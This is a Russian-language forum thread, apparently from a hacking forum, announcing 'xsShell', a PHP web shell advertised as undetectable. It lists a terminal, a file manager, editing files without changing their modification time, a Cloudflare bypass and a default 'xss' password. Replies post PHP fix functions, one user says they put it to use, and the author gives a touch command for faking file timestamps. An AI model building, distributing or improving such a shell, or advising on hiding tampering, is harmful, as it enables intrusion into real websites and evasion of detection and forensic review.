прочее xsShell - Веб шел

[k0d]

Веб шелл написан на PHP+js. Терминал
На момент публикации веб шелл FUD.

Функционал
- Определение IP (ifconfig.me)
- Определение докера.
- Терминал
- Файловый менеджер
-- Создание файлов и директорий.
-- Переименование файлов и директорий.
-- Удаление файлов и директорий.
-- Редактирование файлов без изменении времени последнего изменения файла.

Пароль по умолчанию xss

$password = md5('xss');

Спойлер: Скрины

 

[barnaul]

Молодец. Но веб, это не тольпо про php. Тем более такой в 2024 то году
r57 ван лав

 

[k0d]

Добавил загрузку файла в файловом менеджере.
Исправлен баг не корректного определения пути скрипта.
$_SERVER['DOCUMENT_ROOT'] заменен на $_SERVER['SCRIPT_FILENAME'].
Исправлена некорректное определение прав на файлы и папки.
Протестировал и добавил поддержку php 5.3+ =)
Добавлен Loader при загрузке страниц.
Bypass Cloudflare при изменении файла.

 

[xiaocai]

@getIp(); not work

 

[k0d]

Update v 1.1
-Ip теперь имеет формат ifconfig.me | gethostbyname($_SERVER["SERVER_ADDR"])
-lock shell
-Исправлены мелкие баги и недочеты

 

[Dark_TM]

Update v 1.1
-Ip теперь имеет формат ifconfig.me | gethostbyname($_SERVER["SERVER_ADDR"])
-lock shell
-Исправлены мелкие баги и недочеты

исправление для getip

function getIp(){
    return isset($_SESSION["serverIp"]) ? $_SESSION["serverIp"] : $_SESSION["serverIp"] = file_get_contents("https://ifconfig.me/ip") . " | " . gethostbyname($_SERVER["SERVER_ADDR"]);
}

Исправление для формирования массива $parts

function calculatePath($currentPath, $cm)
{
    if ($cm === '../') {
        $parts = explode('/', rtrim(str_replace("\\", "/", $currentPath), '/'));
        array_pop($parts);
        return implode('/', $parts);
    } elseif ($cm === './') {
        return $currentPath;
    } elseif ($cm === '/') {
        return "/";
    } else {
        $cmParts = explode('/', rtrim($cm, '/'));
        $pathParts = explode('/', rtrim(str_replace("\\", "/", $currentPath), '/'));

        foreach ($cmParts as $part) {
            if ($part === '..') {
                array_pop($pathParts);
            } else {
                $pathParts[] = $part;
            }
        }

        return implode('/', $pathParts);
    }
}

 

[Dread Pirate Roberts]

Протестировал и добавил поддержку php 5.3+ =)

какие версии пхп поддерживаются?

 

[k0d]

какие версии пхп поддерживаются?

тестил на 5.3 7.2 8.1

исправление для getip

function getIp(){
    return isset($_SESSION["serverIp"]) ? $_SESSION["serverIp"] : $_SESSION["serverIp"] = file_get_contents("https://ifconfig.me/ip") . " | " . gethostbyname($_SERVER["SERVER_ADDR"]);
}

Исправление для формирования массива $parts

function calculatePath($currentPath, $cm)
{
    if ($cm === '../') {
        $parts = explode('/', rtrim(str_replace("\\", "/", $currentPath), '/'));
        array_pop($parts);
        return implode('/', $parts);
    } elseif ($cm === './') {
        return $currentPath;
    } elseif ($cm === '/') {
        return "/";
    } else {
        $cmParts = explode('/', rtrim($cm, '/'));
        $pathParts = explode('/', rtrim(str_replace("\\", "/", $currentPath), '/'));

        foreach ($cmParts as $part) {
            if ($part === '..') {
                array_pop($pathParts);
            } else {
                $pathParts[] = $part;
            }
        }

        return implode('/', $pathParts);
    }
}

Спасибо, исправлено.

 

[vovamamon]

Автору спасибо, взял в работу. Дату Last Modified ни как не исправить ? Был шел который правил дату эту, щас найти не могу ни как его (

 

[HikMbed]

Тут много базовых мануалов, без практики на реальных сайтах. Это плохо, переписать мануал из гугла, и выдать за своё это талант.

 

[k0d]

Автору спасибо, взял в работу. Дату Last Modified ни как не исправить ? Был шел который правил дату эту, щас найти не могу ни как его (

touch -t 2024 04 01 04 14 имя файла